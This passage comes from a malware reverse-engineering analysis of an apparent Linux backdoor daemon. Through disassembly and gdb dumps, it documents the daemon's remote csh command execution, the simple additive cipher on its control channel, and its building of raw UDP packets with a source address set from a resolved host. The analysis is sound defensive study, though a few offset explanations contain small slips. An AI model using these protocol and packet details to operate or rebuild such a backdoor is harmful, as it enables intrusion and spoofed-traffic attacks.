0xfffff005(%ebp),%eax 0x8048db9: pushl %eax 0x8048dba: movzbl 0xfffff004(%ebp),%eax 0x8048dc1: pushl %eax 0x8048dc2: movzbl 0xfffff003(%ebp),%eax 0x8048dc9: pushl %eax 0x8048dca: movzbl 0xfffff002(%ebp),%eax 0x8048dd1: pushl %eax 0x8048dd2: call 0x8049d40 Putting this into C format: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp), *0xfffff00e(%ebp), 0xffffbb44(%ebp)) The call is to the same function as in the previous case section, and is named Network_Function_D. There only appears to be one difference in the call, and that has to do with the 12th argument which before was a 0, and in this case is probably set by the blackhat manually. Upon function conclusion the function will _exit(0) as usual. 0x08048de4: Yet again, we end up with very similar code. Again, only the differences will be noted: 0x8048df1: movl $0xc,0x807e778 Global_C is set to 12 (as expected). The byte shift for Buffer_B is 14 bytes for this case section. Function setup looks like this: 0x8048e3f: leal 0xffffbb44(%ebp),%eax 0x8048e45: pushl %eax 0x8048e46: movzbl 0xfffff00d(%ebp),%eax 0x8048e4d: pushl %eax 0x8048e4e: movzbl 0xfffff00c(%ebp),%eax 0x8048e55: pushl %eax 0x8048e56: movzbl 0xfffff00b(%ebp),%eax 0x8048e5d: pushl %eax 0x8048e5e: movzbl 0xfffff00a(%ebp),%eax 0x8048e65: pushl %eax 0x8048e66: movzbl 0xfffff009(%ebp),%eax 0x8048e6d: pushl %eax 0x8048e6e: movzbl 0xfffff008(%ebp),%eax 0x8048e75: pushl %eax 0x8048e76: movzbl 0xfffff007(%ebp),%eax 0x8048e7d: pushl %eax 0x8048e7e: movzbl 0xfffff006(%ebp),%eax 0x8048e85: pushl %eax 0x8048e86: movzbl 0xfffff005(%ebp),%eax 0x8048e8d: pushl %eax 0x8048e8e: movzbl 0xfffff004(%ebp),%eax 0x8048e95: pushl %eax 0x8048e96: movzbl 0xfffff003(%ebp),%eax 0x8048e9d: pushl %eax 0x8048e9e: movzbl 0xfffff002(%ebp),%eax 0x8048ea5: pushl %eax 0x8048ea6: call 0x8049564 C Format: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp), 0xffffbb44(%ebp)) The function call to 0x8049564 seems to be new, contains network function calls, and as such will be named Network_Function_E. The child process would then terminate with a call to _exit() This concludes the case sections, and as such, the core functionality of the binary. The program has now been shown to have the following on demand from the blackhat: * Ability to execute given commands using csh. * The ability to potentially show the response from executing such a command to the blackhat. * Ability to automatically terminate the execution of those commands after a certain period of time. * The ability to execute various functions, one at a time. * The ability to terminate those functions. The first two case statements are extremely interesting, and would have to be of some importance, however their secrets are not yet known. As the binary stands, the core functionality of it appears solid, and built in a modular way such that any function that is called is immediately forked off (and secure from crashing the rest of the daemon). An analysis of the traffic expected by the binary will be completed in Network_Analysis_A. vi) Function Addressing: Address Function Purpose 0x805720c geteuid() Standard 0x8055fbc exit()* Standard 0x8057764 memset()* Standard 0x80569bc signal() Standard 0x80571e8 fork() Standard 0x805733c setsid()* Standard 0x8057134 chdir() Standard 0x8057160 close() Standard 0x8057444 time() Standard 0x80559a0 srandom()** Standard 0x8056cf4 socket() Standard 0x8056b44 recv() Standard 0x80555b0 usleep()* Standard 0x804a1e8 Data_Manipulation_Function_A Memory Manipulation 0x804a194 Data_Manipulation_Function_B Memory Manipulation 0x8048ecc Network_Function_A Network 0x8049174 Network_Function_B Network 0x80499f4 Network_Function_C Network 0x8049d40 Network_Function_D Network 0x8049564 Network_Function_E Network 0x8048f94 Network_Function_F Network 0x8056058 random()** Standard (Or a wrapper) 0x8055e38 random()** Standard 0x80556cc sleep()* Standard 0x80572b0 kill() Standard 0x80557e8 system()** Standard 0x804f808 sprintf()** Standard 0x804f620 fopen()* Standard 0x804f6d4 fread()** Standard 0x804f540 fclose()** Standard 0x8057554 _exit() Standard 0x8056c9c setsockopt() Standard 0x8056a74 bind() Standard 0x8056b04 listen() Standard 0x8056a2c accept() Standard 0x8056bf0 send() Standard 0x805718c dup2() Standard 0x804a2a8 setenv()* Standard 0x804a48c unsetenv()** Standard 0x80555fc execl() Standard 0x804bf80 gethostbyname()* Standard 0x8056480 Misc_Data_Copy() Standard(Assumed) 0x8056c3c sendto() Standard 0x804ce8c inet_addr() Standard 0x804ceb4 inet_aton() Standard * = Unconfirmed but strongly suspected ** = Guess based upon positioning of call vii) Variable Addressing: 0x807e77c Global_A 0x807e784 Global_B 0x807e778 Global_C 0xffffee48(%ebp) Buffer_A (code starting at 0x8048134) 0xffffbb44(%ebp) Buffer_B (code starting at 0x8048134) 0x807e770 PID_Var_A 0x807e774 PID_Var_B viii) Function Analysis This section will look at the functions that were detected to be of significance in the prior analysis. a) Data_Manipulation_Function_A [0x804a1e8] - (Memory Manipulation) Known Usage: function(AmountOfDataReceived-22, IP_Packet_Data, SomeBuffer) Guesses at purpose: From the position that this function appears to be used, it is assumed that it is some sort of unencoder used for translating packet data used in the communication channel, between the blackhat and this binary. It should be noted that this function would be very deliberate, and the code about to be analysed could very well be a public encryption method. It is also quite possible this function does not follow generic C syntax for the production of assembly code since it may well have been written in assembly. Naming Conventions: Parameters will be given the following names: function(DataAmount, Data_In, Data_Out) Disassembly: The code starts off strangely for a C function. The initial stack allocations are quite strange: 0x804a1f1: movl 0x8(%ebp),%edi 0x804a1f4: leal 0xffffffff(%edi),%ebx 0x804a1f7: leal 0x3(%edi),%eax 0x804a1fa: andb $0xfc,%al 0x804a1fc: subl %eax,%esp The long at 0x8(%ebp) would be the "DataAmount" (Given the %ebp push and the sub at 0x804a1eb). It's assumed this is some kind of data amount that the function will have to decode. The code above seems to have the effect of setting up a stack that is directly proportional to the DataAmount + 3. The andb statement appears to simply ensure a 4 byte alignment of the total stack allocation. Something else strange: 0x804a201: movb 0x80675e5,%al 0x804a207: movl 0x10(%ebp),%esi 0x804a20a: movb %al,(%esi) (gdb) x/1b 0x80675e5 0x80675e5: 0x00 Three instructions to simply NULL the first byte of Data_Out (remembering the parameters start from 0x8(%ebp)). Starting at 0x804a20c, looks to be some kind of looping structure with %ebx as some counter. %ebx is first set up here: 0x804a1f1: movl 0x8(%ebp),%edi 0x804a1f4: leal 0xffffffff(%edi),%ebx This corresponds to %ebx starting at DataAmount - 1. The looping structure seems to start here: 0x804a20c: testl %ebx,%ebx 0x804a20e: jl 0x804a29b Indicating the loop will continue until %ebx reaches a state of < 0. 0x804a214: leal 0xffffffff(%ebx),%edx 0x804a217: testl %ebx,%ebx 0x804a219: je 0x804a22c %edx is set to %ebx - 1. %ebx is checked: if it does NOT equal 0 then: 0x804a21b: movl 0xc(%ebp),%esi 0x804a21e: movzbl (%ebx,%esi,1),%eax 0x804a222: movzbl (%edx,%esi,1),%edx 0x804a226: subl %edx,%eax 0x804a228: jmp 0x804a232 0xc(%ebp) corresponds to Data_In so, the first byte from Data_In is loaded into %esi. The movzbl functions effectively use %ebx and %edx as indexes within the Data_In buffer. The first one loading %eax with the byte indexed by %ebx, and the second with the one indexed by %edx. The subl has the effect of subtracting the value of Data_In[%edx] from Data_In[%ebx]. Keping in mind %edx = %ebx - 1, this make sit look like: %eax = Data_In[%ebx] - Data_In[%ebx - 1] This statement also explains the reason for the earlier %ebx conditional of it being 0, for which the following would occur: 0x804a22c: movl 0xc(%ebp),%esi 0x804a22f: movzbl (%esi),%eax This effectively just does: %eax = Data_In[0] Which eliminates the -1 indexing. Either conditional that it follows, it will end up at 0x804a232: 0x804a232: leal 0xffffffe9(%eax),%ecx 0x804a235: testl %ecx,%ecx 0x804a237: jnl 0x804a244 This subtracts 23 from %eax and puts it into %ecx. This value is then checked to be greater than 0. If not: 0x804a23c: addl $0x100,%ecx 0x804a242: js 0x804a23c the above process is started to continue adding 0x100 to %ecx until it turns positive. As soon as %ecx is ensured to be positive: 0x804a244: xorl %edx,%edx 0x804a246: cmpl %edi,%edx 0x804a248: jnl 0x804a25d %edx will ofcourse be 0 for this statement. %edi however will still be equal to DataAmount. The statements above simply result in a jump to 0x804a25d if 0 is not less than DataAmount (i.e. if DataAmount <= 0). A loop follows: 0x804a24c: movl 0x10(%ebp),%esi 0x804a24f: movb (%edx,%esi,1),%al 0x804a252: movl 0xfffffffc(%ebp),%esi 0x804a255: movb %al,(%edx,%esi,1) 0x804a258: incl %edx 0x804a259: cmpl %edi,%edx 0x804a25b: jl 0x804a24c 0x10(%ebp) is matched with the address of the start of the Data_Out buffer. 0xfffffffc(%ebp) was setup earlier to point to the end of the local stack frame, more specifically to a buffer believed to have been setup to be the same size as DataAmount. With this knowledge, the above loop can be seen to copy data one byte at a time from Data_Out to this localised buffer. The total amount copied will be DataAmount bytes (%edi). Following this duplication of Data_Out: 0x804a25d: movl 0x10(%ebp),%esi 0x804a260: movb %cl,(%esi) The outcome of these two lines will be to set the first byte of Data_Out to the %ecx last modified at 0x804a23c (the one that was continually incremented until it turned positive). The following is the setup to the next loop: 0x804a262: movl $0x1,%edx 0x804a267: cmpl %edi,%edx 0x804a269: jnl 0x804a27e Similar to the earlier loop, %edi is still = DataAmount, and %edx forms a loop counter which is initialised to 1. Now for the loop: 0x804a26c: movl 0xfffffffc(%ebp),%esi 0x804a26f: movb 0xffffffff(%edx,%esi,1),%al 0x804a273: movl 0x10(%ebp),%esi 0x804a276: movb %al,(%edx,%esi,1) 0x804a279: incl %edx 0x804a27a: cmpl %edi,%edx 0x804a27c: jl 0x804a26c 0xfffffffc(%ebp) is still the same pointer to a local buffer as it was in the last loop. The loop consists of a byte copy routine seems to have a purpose of byte shifting the local buffer to the right by 1 byte. Next up is a call: 0x804a27e: movl 0xfffffffc(%ebp),%esi 0x804a281: pushl %esi 0x804a282: pushl %ecx 0x804a283: pushl $0x80678bf 0x804a288: movl 0x10(%ebp),%esi 0x804a28b: pushl %esi 0x804a28c: call 0x804f808 0xfffffffc(%ebp) still points to the local buffer. %ecx is the same byte as earlier, the one that all the operations were done upon. 0x80678bf: (gdb) x/1s 0x80678bf 0x80678bf: "%c%s" Function at 0x804f808 corresponds to an sprintf() which matches the inputs given. Continuing with the main loop: 0x804a294: decl %ebx 0x804a295: jns 0x804a214 For a reminder, %ebx started the loop at DataAmount. According to the above, it will finish after completing a round of %ebx = 0. This is effectively the end of the fuction. Disassembly Review: It turns out this function is not as complex as expected. It is actually quite simple. It seems to be a generic data obfuscation function that will take a buffer of N bytes, and produce an obfuscated buffer of N bytes. The method is very simple, whereby the loop starts at the end of Data_In, taking one byte at a time and subtracting the byte directly before it. On top of this, what looks to be some arbitrary value of 23 is also subtracted from it. The result of these subtractions forms the last byte of the Data_Out buffer. The loop cycles through doing this for the entire buffer, obviously leaving out the subtraction of the 'previous' byte when it reaches the start of Data_In. Function Overview: As obvious encoder/decoder. This functionality was already assumed from the ways this function and Data_Manipulation_Function_B were used throughout the rest of the code. The way that this function looks to be called on packets recv()'d and Data_Manipulation_Function_B looks to be called just before functions that look to send (yet to be absolutely certain), suggest that Data_Manipulation_Function_A is more than likely an encoder function, and Data_Manipulation_Function_B will probably be a decoder function. b) Data_Manipulation_Function_B [0x804a194] - (Memory Manipulation) Known Usage: function(number, Buffer1, Buffer2) Guesses at purpose: After the analysis of Data_Manipulation_Function_A, the purpose of Data_Manipulation_Function_B doesn't take too much imagination to come up with. It is more than likely a decoder function for a buffer of data. Naming Conventions: Parameters will be given the following names: function(DataAmount, Data_In, Data_Out) Disassembly: One of the first functional things to occur: 0x804a19a: movl 0x8(%ebp),%edi 0x804a19d: movl 0xc(%ebp),%esi 0x804a1a0: movl 0x10(%ebp),%ebx 0x804a1a3: movb 0x80675e5,%al 0x804a1a9: movb %al,(%ebx) To put references on everything, 0x8(%ebp) would be DataAmount, 0xc(%ebp) corresponds to a pointer to Data_In buffer, and 0x10(%ebp) will be a pointer to Data_Out buffer. The next two lines simply seem to set the first byte of the Data_Out buffer to 0 (albeit a strange way of doing it). We then start setting up for a call: 0x804a1ab: movb (%esi),%al 0x804a1ad: addb $0x17,%al 0x804a1af: movsbl %al,%eax 0x804a1b2: pushl %eax 0x804a1b3: pushl $0x80678bc 0x804a1b8: pushl %ebx 0x804a1b9: call 0x804f808 (gdb) x/1s 0x80678bc 0x80678bc: "%c" The 0x804f808 call corresponds to a sprintf() call. Obviously the format string is for a single character, the destination is Data_Out. The character will consist of the first byte from Data_In, plus 0x17. This appears to be a setup to a loop: 0x804a1be: movl $0x1,%ecx 0x804a1c3: cmpl %edi,%ecx 0x804a1c5: je 0x804a1dd Initialising %ecx to 1 and checking if it exceeds the DataAmount. If it doesn't, it continues: 0x804a1c8: movzbl 0xffffffff(%ebx,%ecx,1),%edx 0x804a1cd: movzbl (%ecx,%esi,1),%eax 0x804a1d1: leal 0x17(%edx,%eax,1),%eax 0x804a1d5: movb %al,(%ecx,%ebx,1) 0x804a1d8: incl %ecx 0x804a1d9: cmpl %edi,%ecx 0x804a1db: jne 0x804a1c8 Remembering that %ebx points to Data_Out, one will see that the first statement loads %edx with an indexed value from Data_Out, corresponding to (%ecx - 1). %esi points to Data_In, as such, the second statement loads up an indexed byte from Data_In, corresponding to %ecx. The leal sees to the addition of the byte from Data_In, the byte from Data_Out, and a value of 0x17. This value is then moved into the corresponding %ecx index in Data_Out. %ecx is incremented and the process starts over again using the next index along. This continues until it reaches the end of the buffer (indicated by %ecx meeting up with DataAmount), at which time the function is over, and it returns. Disassembly Review: A much simpler case than in Data_Manipulation_Function_A. The mirrored processing of Data_Manipulation_Function_A and Data_Manipulation_Function_B are obvious. This function simply forms a loop utilising a byte from Data_In, the previously encoded byte, and an arbitrary value of 23. Adding these together and effectively using the low-order byte (which is effectively the same as a modulus 0xFF) to form the next encoded byte. The encoded bytes are stacked up in Data_Out. Function Overview: Once again, quite obviously an encoder/decoder. What becomes apparant from the combined analysis of these two functions is that there is no 'encoder' and 'decoder'. Either function will encode a buffer, and the other function will decode it. In searching Google, several references to modulus-based ciphers describe similar methods of encoding data, but an exact reference to either pseudocode or actual program code to do what is done here could not be found. c) Network_Function_A [0x8048ecc] - (Network) Known Usage: function(Buffer1, Buffer2, number) Guesses at purpose: This function is believed to be a communications function to send data to the blackhat. The reason behind this belief is that just before this function was called, Data_Manipulation_Function_B was called. Data_Manipulation_Function_B is believed to be used an an encoding function. The only reason to call such an encoding function before sending network traffic is if it is part of the communications channel to the blackhat. Naming Conventions: Parameters will be given the following names: function(Buffer1, EncodedBuffer, DataAmount) Disassembly: Starting off: 0x8048ed2: movl 0x8(%ebp),%eax 0x8048ed5: movl 0x10(%ebp),%edi 0x8048ed8: cmpl $0x0,0x807e784 0x8048edf: je 0x8048f10 0x8(%ebp) corresponds to Buffer1. 0x10(%ebp) corresponds to DataAmount. 0x807e784 was earlier named Global_B. Global_B was set by the second case section in the "Core Functionality". If Global_B is NOT 0: We commence a loop, starting with: 0x8048ee1: movl %eax,%ebx 0x8048ee3: leal 0x24(%ebx),%esi 0x8048ee6: leal (%esi),%esi 0x8048ee8: pushl $0xfa0 0x8048eed: call 0x80555b0 The code at 0x80555b0 is believed to be usleep() code. 0xfa0 would be a 4000 microsecond sleep. Following this: 0x8048ef2: pushl %edi 0x8048ef3: movl 0xc(%ebp),%edx 0x8048ef6: pushl %edx 0x8048ef7: pushl %ebx 0x8048ef8: pushl $0x807e780 0x8048efd: call 0x8048f94 %edi will still be set to DataAmount. %edx will have been set to EncodedBuffer. %ebx was earlier set to Buffer1. 0x807e780 contents appears to initially consist of all 0's. The analysis in the "Core Functionality" section has shown that a particular packet using the binary's communication channel can be used to set the first four bytes of this buffer to the destination IP of an incoming packet (expected to be the machine running the binary). The call to 0x8048f94 has not yet been identified. It was earlier followed and revealed to contain network functionality (thus why this function was believed to be a network related function). This extra function will now be named Network_Function_F and will be analysed later. The end of the looping structure: 0x8048f05: addl $0x4,%ebx 0x8048f08: cmpl %esi,%ebx 0x8048f0a: jle 0x8048ee8 As can be seen, %ebx is incremented by 4. %esi was earlier set to 36 bytes on top of Buffer1. %ebx starts at the beginning of Buffer1, therefore the jle would result in the loop being repeated 10 times. If Global_B IS 0: We have a similar setup to just one iteration of the above loop: 0x8048f10: pushl %edi 0x8048f11: movl 0xc(%ebp),%edx 0x8048f14: pushl %edx 0x8048f15: pushl %eax 0x8048f16: pushl $0x807e780 0x8048f1b: call 0x8048f94 The setup is identical to what we just saw in the above loop. It appears that if Global_B is 0, Network_Function_F is called with the second parameter(push %eax) being set to the start of Buffer1. No matter what Global_B is, the function now returns. Disassembly Review: The whole function hinges on Global_B. If Global_B is 0, it seems to call Network_Function_F with a pointer to the beginning of Buffer1. If Global_B is non-zero, A loop is constructed to call Network_Function_F 10 times, each time passing identical arguments, except for a pointer that starts at the beginning of Buffer1, and is incremented by 4 bytes for each iteration of the loop. Function Overview: This function appears to be some kind of wrapper to Network_Function_F. All it seems to do is determine whether Network_Function_F is called 1 time or 10 times, all based upon Global_B. The only way to work out what is actually going on and why this has any significance is to work out what purpose Buffer1 plays for Network_Function_F. Buffer1's data seems static for the duration of the binary's execution, except when the blackhat manages to call case section 2 from the "Core Functionality" of the binary, in which case they have the ability to set the contents of this buffer of up to 40 bytes. d) Network_Function_B [0x8049174] - (Network) Known Usage: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), 0, *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), 0xffffbb44(%ebp)) Guesses at purpose: No idea. Naming Conventions: Parameters will be given the following names: function(LongA, LongB, LongC, LongD, NumberA, LongE, LongF, LongG, Buffer1) Disassembly: Start off by loading some parameters into local variables: 0x8049180: movb 0x8(%ebp),%bl 0x8049183: movb %bl,0xfffff9bc(%ebp) 0x8049189: movb 0xc(%ebp),%bl 0x804918c: movb %bl,0xfffff9b8(%ebp) 0x8049192: movb 0x10(%ebp),%bl 0x8049195: movb %bl,0xfffff9b4(%ebp) 0x804919b: movb 0x14(%ebp),%bl 0x804919e: movb %bl,0xfffff9b0(%ebp) Doesn't really help any, so, continuing: 0x80491a4: leal 0xffffffdc(%ebp),%edi 0x80491a7: movl $0x8067698,%esi 0x80491ac: cld 0x80491ad: movl $0x9,%ecx 0x80491b2: repz movsl %ds:(%esi),%es:(%edi) Looking at the loop, it becomes apparant that it takes a starting position at 0x8067698 and copies 9 long's worth of data to the local stack address of 0xffffffdc(%ebp). The data: (gdb) x/36b 0x8067698 0x8067698: 0x15 0x00 0x00 0x00 0x15 0x00 0x00 0x00 0x80676a0: 0x14 0x00 0x00 0x00 0x15 0x00 0x00 0x00 0x80676a8: 0x15 0x00 0x00 0x00 0x19 0x00 0x00 0x00 0x80676b0: 0x14 0x00 0x00 0x00 0x14 0x00 0x00 0x00 0x80676b8: 0x14 0x00 0x00 0x00 Obviously forming a buffer of: 21,21,20,21,21,25,20,20,20. More setup: 0x80491b4: movl $0x1,0xfffff9ac(%ebp) 0x80491be: leal 0xfffffde8(%ebp),%edi 0x80491c4: movl $0x80676bc,%esi 0x80491c9: cld 0x80491ca: movl $0x7d,%ecx 0x80491cf: repz movsl %ds:(%esi),%es:(%edi) 0xfffff9ac(%ebp) is unknown, but is set to 1. A loop is constructed to copy 0x7d longs from 0x80676bc to a local buffer starting at 0xfffffde8(%ebp). The data: (gdb) x/500 0x80676bc 0x80676bc: 0x47 0x6e 0x01 0x00 0x00 0x01 0x00 0x00 0x80676c4: 0x00 0x00 0x00 0x00 0x03 0x63 0x6f 0x6d 0x80676cc: 0x00 0x00 0x06 0x00 0x01 0x00 0x00 0x00 0x80676d4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x80676dc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x80676e4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 [...] The full dump has not been produced above. More variable setup occurs, followed by: 0x8049201: cmpl $0x0,0x18(%ebp) 0x8049205: je 0x804920a 0x18(%ebp) would correspond to the NumberA parameter of the function. The effect of the conditional appears to simply jump the following: 0x8049207: decl 0x18(%ebp) The outcome is that if NumberA != 0 then NumberA is decremented. A call is then setup: 0x804920a: pushl $0xff 0x804920f: pushl $0x3 0x8049211: pushl $0x2 0x8049213: call 0x8056cf4 This is a socket() call which would look like: socket(AF_INET, SOCK_RAW, IPPROTO_RAW) Checking the result: 0x8049218: movl %eax,0xfffff9a8(%ebp) 0x804921e: addl $0xc,%esp 0x8049221: testl %eax,%eax 0x8049223: jle 0x8049548 Socket number is moved into 0xfffff9a8(%ebp), with the condition of it being an error resulting in a jump to 0x8049548. If it is successful (>0) then it continues: 0x8049229: movl $0x0,0xfffff99c(%ebp) 0x8049233: movl $0x0,0xfffff998(%ebp) 0x804923d: pushl $0x400 0x8049242: pushl $0x0 0x8049244: pushl %esi 0x8049245: call 0x8057764 %esi was earlier set: 0x80491d1: leal 0xfffff9c8(%ebp),%esi The call to 0x8057764 was earlier elieved to be a memset(). This fits into this situation and would look like: memset(0xfffff9c8(%ebp), 0, 0x400) This makes something from earlier stand out: 0x80491d7: leal 0xfffff9dc(%ebp),%ebx 0x80491e3: leal 0xfffff9e4(%ebp),%ebx Effectively setting up two variables to point to within the same buffer (it would be strange to memset across multiple buffers). A quick look at the differences between them soon produce suspicions of future uses: 0xfffff9c8(%ebp) = X 0xfffff9dc(%ebp) = X + 20 0xfffff9e4(%ebp) = X + 20 + 8 Keeping in mind an IP header is 20 bytes, and a UDP header is 8, one should definately see suspicion about these numbers. Back to the code: 0x8049252: cmpl $0x0,0x24(%ebp) 0x8049256: je 0x80492b2 0x8049258: cmpl $0x0,0xfffff998(%ebp) 0x804925f: jg 0x80492b2 0x24(%ebp) will correspond to LongG. If it is 0, it will jump to 0x80492b2. 0xfffff998(%ebp) has been seen before, and was set to 0. It is tested to be greater than 0, if so, it will jump to 0x80492b2. Otherwise: 0x8049261: movl 0x28(%ebp),%ebx 0x8049264: pushl %ebx 0x8049265: call 0x804bf80 The call to 0x804bf80 is unknown, so a quick analysis is in order: calls 0x804a9d8 calls 0x804f620 - fopen() Looking at parameters passed to this function: (gdb) x/1s 0x8067904 0x8067904: "/etc/host.conf" (gdb) x/1s 0x8067913 0x8067913: "r" Checking hosts lookup configuration (perhaps this is some kind of dns function) calls 0x804e180 calls 0x804d744 calls 0x804dfb4 calls 0x8057254 0x8057258: movl $0x4e,%eax 0x8057263: int $0x80 gettimeofday() calls 0x8056e64 (does nothing system-wise) calls 0x8057230 0x8057233: movl $0x14,%eax 0x8057238: int $0x80 getpid() calls 0x8056e64 (already analysed) calls 0x804e490 calls 0x804f620 - fopen() (gdb) x/1s 0x8067d6b 0x8067d6b: "HOSTALIASES" Definately raises suspicion of host resolution function. calls 0x804dfe0 calls 0x804d744 calls 0x804f620 - fopen() (gdb) x/1s 0x8067c0f 0x8067c0f: "/etc/resolv.conf" Most probably a gethostby* function. calls 0x804b800 calls 0x804d02c (does nothing system-wise) calls 0x804d6b8 (does nothing system-wise) calls 0x804a5cc calls 0x8056cf4 (socket()) The function analysis above is in no way complete (far from it). Random checks of certain calls has resulted in what looks like a form of host resolution function. At this stage it is unknown exactly what function it is, however a look at the parameters passed to it show it to be called as: function(Buffer1) A few assumptions were made and tested about this function, which in the end looks to be: struct hostent *gethostbyname(Buffer1) Reasoning behind this function being is primarily because of the result usage (will be looked at shortly). The function located at 0x804bf80 will be named gethostbyname for the rest of this analysis. Result of this function is then tested: 0x804926a: movl %eax,%edx 0x804926c: addl $0x4,%esp 0x804926f: testl %edx,%edx 0x8049271: jne 0x8049288 If the return from gethostbyname() is 0 (fail): The following is done: 0x8049273: pushl $0x258 0x8049278: call 0x80556cc 0x804927d: movl $0x1,%edi 0x8049282: addl $0x4,%esp 0x8049285: jmp 0x80492b2 The call matches up to a sleep(0x258). The movl sees to the setting of %edi to 1. This was earlier set to 0. It is unknown what role this plays as yet. If the return from gethostbyname() is nonzero (successful): Execution continues: 0x8049288: pushl $0x4 0x804928a: leal 0xfffff9c4(%ebp),%eax 0x8049290: pushl %eax 0x8049291: movl 0x10(%edx),%eax 0x8049294: movl (%eax),%eax 0x8049296: pushl %eax 0x8049297: call 0x8056480 0x8056480 is unidentified as a function, so we analyse it: 0x8056505: repz movsl %ds:(%esi),%es:(%edi) It primarily consists of loops set up to copy data. %esi, %edi, and %ecx are all based upon parameters to this function. Its done in such a way that the above stack setup *should* result in 0x4 bytes from *0x10(%edx) being copied to 0xfffff9c4(%ebp). Judging from its position, the function is probably some compiler-placed one rather than home-made (so to speak). It may be as simple as a memcpy or bcopy, but since there is no *real* way to be sure, it will be named as Misc_Data_Copy. The reasoning behind believing the earlier function to be gethostbyname() is the way a parameter is passed to Misc_Data_Copy. More specifically, 0x10(%edx) is setup as being offset by +16 bytes from %edx (which was earlier set to the return value from the function). In looking at the hostent structure: struct hostent { __const char *h_name; /* official name of host */ char **h_aliases; /* alias list */ int h_addrtype; /* host address type */ int h_length; /* length of address */ char **h_addr_list; /* list of addresses */ }; As offset of 10 bytes would point to the start of h_addr_list. The data copy above would effectively result in the copy of 4 bytes (length of an IPv4 address) from this first address, to 0xfffff9c4(%ebp). This all fits in very well with the rest of this function, so it is assumed to be correct. The IP address seems to then be stored: 0x804929c: movl 0xfffff9c4(%ebp),%eax 0x80492a2: movl %eax,0xc(%esi) 0x80492a5: movl $0x9c40,0xfffff998(%ebp) 0xc(%esi) corresponds to 12 bytes after 0xfffff9c8(%ebp). Keeping in mind earlier the suspicion that 0xfffff9c8(%ebp) is really a buffer to construct a UDP packet, this all fits together with the IP address of the host specified in Buffer1 being placed in the 'source address' position of the buffer (bytes13-16). The variable at 0xfffff998(%ebp) was earlier set to 0, but its purpose is yet unknown. With what looks to be the end of the conditionals, the following code will always be executed: 0x80492b2: testl %edi,%edi 0x80492b4: jne 0x8049250 %edi is tested. It was initially set to a state of 0 and would remain in that state unless the gethostbyname() function was called and had a failure, in which case it would be 1. The jump back to 0x8049250 will occur only if gethostbyname() was called and failed. Otherwise: 0x80492b8: movl $0x0,0xfffff990(%ebp) 0x80492c2: leal (%esi),%esi 0x80492c4: cmpl $0x1,0xfffff9ac(%ebp) 0x80492cb: jne 0x80492e8 0xfffff990(%ebp) is set to 0. 0xfffff9ac(%ebp) was initially set to 1, so the first iteration at least of this code will continue: 0x80492cd: movl $0x0,0xfffff9ac(%ebp) 0x80492d7: call 0x8055e38 The same variable is then set back to 0, and a call to 0x8055e38 takes place. This call is short and to the point, but doesn't seem to do anything!?! It does some mathematicals based upon some variables at 0x807895? and returns the result. When looking at the next few statements one would assume it to be some kind of random() function, but this has already been assumed to be at 0x8056058. The assumption was not proven in any way and was more a guess based upon where it was called. A quick disassembly of the code at 0x8056058 soon reveals that it actually calls the code at 0x8055e38! This means the earlier assumption is most probably incorrect and that 0x8055e38 is most likely to be random(). Either way: 0x80492dc: movl $0x1f40,%ebx 0x80492e2: idivl %ebx,%eax This results in %eax effectively being divided by 0x1f40. The result utilised from this process is %edx (the remainder). The purpose of this operation appears to be solely for the remainer, in a form of MOD operation. This would make a lot of sense if the previous function was indeed random(). If 0xfffff9ac(%ebp) is not 1 (perhaps on following iterations), %edx is set to 0. At this point, %edx was either set to a random number 0-8000, or 0 depending upon 0xfffff9ac(%ebp) (initially set so %edx is random). No matter what the last conditional worked out to be, it continues: 0x80492ea: cmpl $0x0,0x806d22c(,%edx,4) 0x80492f2: je 0x8049530 A long value at 0x806d22c with offset %edx is checked. If it is 0, it jumps to 0x8049530, if not, we continue: 0x80492f8: leal 0x806d22c(,%edx,4),%edx 0x80492ff: movl %edx,0xfffff994(%ebp) Once again, we use this offset by %edx, this time to put a memory address into 0xfffff994(%ebp). We then use this address: 0x8049308: movl 0xfffff994(%ebp),%ebx 0x804930e: movl (%ebx),%eax 0x8049310: movl %eax,0xfffffddc(%ebp) 0x8049316: movl 0xfffff990(%ebp),%ebx To extract the value from that memory location and put it into 0xfffffddc(%ebp). %ebx is then set to the value at 0xfffff990(%ebp) 0x804931c: leal 0xfffffde8(%ebp,%ebx,1),%edx 0x8049323: movl 0xffffffdc(%ebp,%edi,4),%eax 0x8049327: pushl %eax 0x8049328: pushl %edx 0x8049329: movl 0xfffff9a0(%ebp),%ebx 0x804932f: pushl %ebx 0x8049330: call 0x805652c A function call to 0x805652c is setup and executed. The function is not known, but in looking at the contents, a memory copy loop is formed such that the above stack setup would result in *0xffffffdc(%ebp,%edi,4) bytes being copied from 0xfffffde8(%ebp,%ebx,1) to 0xfffff9a0(%ebp). Assuming %edi never exceeds 8, *0xffffffdc(%ebp,%edi,4) would always point to one of the following values: 21,21,20,21,21,25,20,20,20 which were placed into the buffer earlier. 0xfffffde8(%ebp,%ebx,1) follows an identical behaviour. 0xfffffde8(%ebp) was earlier setup as a 500 byte copy of preset data. Using %ebx as an index, the amount of data specified is copied to a memory location specified at 0xfffff9a0(%ebp). This was earlier set to: 0x80491e3: leal 0xfffff9e4(%ebp),%ebx 0x80491e9: movl %ebx,0xfffff9a0(%ebp) A look back at suspicions about this whole section: 0xfffff9e4(%ebp) = X + 20 + 8 If this was indeed a setup for a UDP IP packet, this data copy would fit in EXACTLY to form the data component of the packet. More randomising code: 0x8049338: call 0x8055e38 0x804933d: movl $0xff,%ebx 0x8049342: cltd 0x8049343: idivl %ebx,%eax %edx is now presumed to be a random number 0 to 0xff. It's then stored: 0x8049345: movl 